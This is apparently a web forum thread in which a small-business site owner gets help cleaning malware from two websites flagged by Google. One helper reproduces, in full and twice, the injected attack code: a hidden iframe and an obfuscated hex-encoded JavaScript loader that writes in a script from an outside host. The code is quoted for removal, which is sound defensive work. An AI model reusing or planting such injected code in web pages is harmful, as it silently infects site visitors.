Detect badware on my website
i was wondering if someone could help me with my problem. i received an email to say that my websites www.rockliffehouse.co.uk and www.johnhillequestriantraining.co.uk had malware. Someone very kindly suggested a code it was and i have removed it from all of the pages. i have requested an review and it has been denied saying it still has malware ( Malicious software is hosted on 2 domain(s), including 94.247.2.0/, gogo2me.net/.)
i have checked the websites on www.unmaskparasites.com and it says they are clean. could anyone have a look and see if they can see something i have missed.
they are small websites only 5 pages each:
www.rockliffehouse.co.uk/Bookings.html
www.rockliffehouse.co.uk/attractions.html
www.rockliffehouse.co.uk/accommodation.html
www.rockliffehouse.co.uk/contact.html
www.rockliffehouse.co.uk/index.html
www.johnhillequestriantraining.co.uk/index.html
www.johnhillequestriantraining.co.uk/contact.html
www.johnhillequestriantraining.co.uk/photos.html
www.johnhillequestriantraining.co.uk/trainingdays.html
www.johnhillequestriantraining.co.uk/aboutjohn.html
thank you very very much in advance
Hi,
When I check both www.rockliffehouse .co .uk/index.html and www.johnhillequestriantraining .co .uk/index.html with Unmask Parasites the hidden IFrame is still detected. And when I check the HTML code I can still see the same malicious scripts.
Your pages either got reinfected or you failed to remove the malicios code.
Did you check your computer for spyware and trojans? Did you change the passwords?
You might also need to contact your hosting provider.
Denis
http://www.UnmaskParasites.com
Hi Denis
I have removed all of the iframe and i just checked again and it does not appear to be back.
www.UnmaskParasites.com had them both marked as clean all yesterday. Today when i try and check it is not doing anything not giving me any result.
i ran AVG and malwarebytes and they have found nothing on my computer.
can you advise something else i should run.
thank
Rachael
Rachael,
What do you mean by Unmask Parasites not giving you any result? It is in beta stage and I’m interested in hearing about any issues.
I just checked once more:
http://www.unmaskparasites.com/security-report/?page=www.johnhillequestriantraining.co.uk/index.html
http://www.unmaskparasites.com/security-report/?page=www.rockliffehouse.co.uk
The hidden iframe is still detected.
Unfortunately, I’m not a specialist in antivirus tools so I can’t advise anything. I just know that if you are on Windows and loaded your own sites recently in Internet Explorer with enabled JavaScript, the chances are you are infected.
I’ve just published a blog post about this gogo2me exploit. You might want to read it.
http://blog.unmaskparasites.com/2009/01/14/gogo2me-hidden-iframe-injection/
Denis
http://www.UnmaskParasites.com
Hi Rachee,
I checked www.rockliffehouse.co.uk, and on index.html I found the following suspicious code. I believe this is what is causing the problem. If you remove all of this code, you should no longer be flagged. Note that there are some extra slashes below, because I did a "cut and paste" into this form. Let me know if you have any more questions. It appears to be the same problem on www.johnhillequestriantraining.co.uk.
<iframe src=‘http://url/’ width=‘1’ height=‘1’ style=‘visibility: hi\
dden;’></iframe><script>function c102916999516l496db8026a0dc(l496db8026a4c3){ var l496db8026\
a8ab=16; return (parseInt(l496db8026a4c3,l496db8026a8ab));}function l496db8026b07d(l496db802\
6b464){ var l496db8026c92e=2; var l496db8026b84d=‘’;l496db8026cfbe=String.fromCharCode;for(l\
496db8026bc36=0;l496db8026bc36<l496db8026b464.length;l496db8026bc36+=l496db8026c92e){ l496db\
8026b84d+=(l496db8026cfbe(c102916999516l496db8026a0dc(l496db8026b464.substr(l496db8026bc36,l\
496db8026c92e))));}return l496db8026b84d;} var x80=’‘;var l496db8026d3a7=’3C736’+x80+’3726’+\
x80+’970743E6’+x80+’96’+x80+’6’+x80+’28216’+x80+’D796’+x80+’96’+x80+’1297B6’+x80+’46’+x80+’F\
6’+x80+’3756’+x80+’D6’+x80+’56’+x80+’E742E77726’+x80+’9746’+x80+’528756’+x80+’E6’+x80+’5736’\
+x80+’36’+x80+’1706’+x80+’528202725336’+x80+’32536’+x80+’392536’+x80+’36’+x80+’2537322536’+x\
80+’312536’+x80+’6’+x80+’42536’+x80+’352532302536’+x80+’6’+x80+’52536’+x80+’312536’+x80+’6’+\
x80+’42536’+x80+’3525336’+x80+’42536’+x80+’332533312533302532302537332537322536’+x80+’332533\
6’+x80+’42532372536’+x80+’3825373425373425373025336’+x80+’125326’+x80+’6’+x80+’25326’+x80+’6\
’+x80+’2536’+x80+’372536’+x80+’6’+x80+’6’+x80+’2536’+x80+’372536’+x80+’6’+x80+’6’+x80+’25333\
22536’+x80+’6’+x80+’42536’+x80+’3525326’+x80+’52536’+x80+’6’+x80+’52536’+x80+’3525373425326’\
+x80+’6’+x80+’25326’+x80+’52536’+x80+’372536’+x80+’6’+x80+’6’+x80+’25326’+x80+’6’+x80+’2536’\
+x80+’332536’+x80+’382536’+x80+’352536’+x80+’332536’+x80+’6’+x80+’225326’+x80+’52536’+x80+’3\
82537342536’+x80+’6’+x80+’42536’+x80+’6’+x80+’32532372532302537372536’+x80+’392536’+x80+’342\
537342536’+x80+’3825336’+x80+’4253331253336’+x80+’253336’+x80+’2532302536’+x80+’382536’+x80+\
’352536’+x80+’392536’+x80+’372536’+x80+’3825373425336’+x80+’4253331253338253336’+x80+’253230\
2537332537342537392536’+x80+’6’+x80+’32536’+x80+’3525336’+x80+’4253237253736’+x80+’2536’+x80\
+’392537332536’+x80+’392536’+x80+’322536’+x80+’392536’+x80+’6’+x80+’32536’+x80+’392537342537\
3925336’+x80+’12536’+x80+’382536’+x80+’392536’+x80+’342536’+x80+’342536’+x80+’352536’+x80+’6\
’+x80+’525323725336’+x80+’525336’+x80+’325326’+x80+’6’+x80+’2536’+x80+’392536’+x80+’36’+x80+\
’2537322536’+x80+’312536’+x80+’6’+x80+’42536’+x80+’3525336’+x80+’52729293B7D76’+x80+’6’+x80+\
’172206’+x80+’D796’+x80+’96’+x80+’13D7472756’+x80+’53B3C2F736’+x80+’3726’+x80+’970743E’;docu\
ment.write(l496db8026b07d(l496db8026d3a7));</script>
Here is the malicious code on www.johnhillequestriantraining.co.uk:
<iframe src=‘http://url/’ width=‘1’ height=‘1’ style=‘visibility: hidden;’></iframe><\
script>function c102916999516l496db4557465a(l496db45574a3f){ var l496db45574e37=16; return (\
parseInt(l496db45574a3f,l496db45574e37));}function l496db455755f9(l496db455759e1){ var l496\
db45575dcd=‘’;l496db45576d6b=String.fromCharCode;for(l496db455761b1=0;l496db455761b1<l496db4\
55759e1.length;l496db455761b1+=2){ l496db45575dcd+=(l496db45576d6b(c102916999516l496db455746\
5a(l496db455759e1.substr(l496db455761b1,2))));}return l496db45575dcd;} var x45=’‘;var l496db\
45577152=’3C736’+x45+’3726’+x45+’970743E6’+x45+’96’+x45+’6’+x45+’28216’+x45+’D796’+x45+’96’+\
x45+’1297B6’+x45+’46’+x45+’F6’+x45+’3756’+x45+’D6’+x45+’56’+x45+’E742E77726’+x45+’9746’+x45+\
’528756’+x45+’E6’+x45+’5736’+x45+’36’+x45+’1706’+x45+’528202725336’+x45+’32536’+x45+’392536’\
+x45+’36’+x45+’2537322536’+x45+’312536’+x45+’6’+x45+’42536’+x45+’352532302536’+x45+’6’+x45+’\
52536’+x45+’312536’+x45+’6’+x45+’42536’+x45+’3525336’+x45+’42536’+x45+’332533312533302532302\
537332537322536’+x45+’3325336’+x45+’42532372536’+x45+’3825373425373425373025336’+x45+’125326\
’+x45+’6’+x45+’25326’+x45+’6’+x45+’2536’+x45+’372536’+x45+’6’+x45+’6’+x45+’2536’+x45+’372536\
’+x45+’6’+x45+’6’+x45+’2533322536’+x45+’6’+x45+’42536’+x45+’3525326’+x45+’52536’+x45+’6’+x45\
+’52536’+x45+’3525373425326’+x45+’6’+x45+’25326’+x45+’52536’+x45+’372536’+x45+’6’+x45+’6’+x4\
5+’25326’+x45+’6’+x45+’2536’+x45+’332536’+x45+’382536’+x45+’352536’+x45+’332536’+x45+’6’+x45\
+’225326’+x45+’52536’+x45+’382537342536’+x45+’6’+x45+’42536’+x45+’6’+x45+’325323725323025373\
72536’+x45+’392536’+x45+’342537342536’+x45+’3825336’+x45+’4253336’+x45+’25333125333525323025\
36’+x45+’382536’+x45+’352536’+x45+’392536’+x45+’372536’+x45+’3825373425336’+x45+’42533352533\
322532302537332537342537392536’+x45+’6’+x45+’32536’+x45+’3525336’+x45+’4253237253736’+x45+’2\
536’+x45+’392537332536’+x45+’392536’+x45+’322536’+x45+’392536’+x45+’6’+x45+’32536’+x45+’3925\
373425373925336’+x45+’12536’+x45+’382536’+x45+’392536’+x45+’342536’+x45+’342536’+x45+’352536\
’+x45+’6’+x45+’525323725336’+x45+’525336’+x45+’325326’+x45+’6’+x45+’2536’+x45+’392536’+x45+’\
36’+x45+’2537322536’+x45+’312536’+x45+’6’+x45+’42536’+x45+’3525336’+x45+’52729293B7D76’+x45+\
’6’+x45+’172206’+x45+’D796’+x45+’96’+x45+’13D7472756’+x45+’53B3C2F736’+x45+’3726’+x45+’97074\
3E’;document.write(l496db455755f9(l496db45577152));</script>
thank you all for your help i have hopefully got on top of this. i have removed all bad coding and google review say that www.johnhillequestriantraining.co.uk is now clean (the warning has not been removed though does anyone know how long this takes?).
i have requested a review for www.rockliffehouse.co.uk and am waiting for the results.
Unmask Parasites was not giving me any results when using my bt/yahoo browser when i clicked check it just reloaded the same page again with no result on but when i done it in internet explorer it worked fine and said all pages were clean.
thanks again everyone
Rach
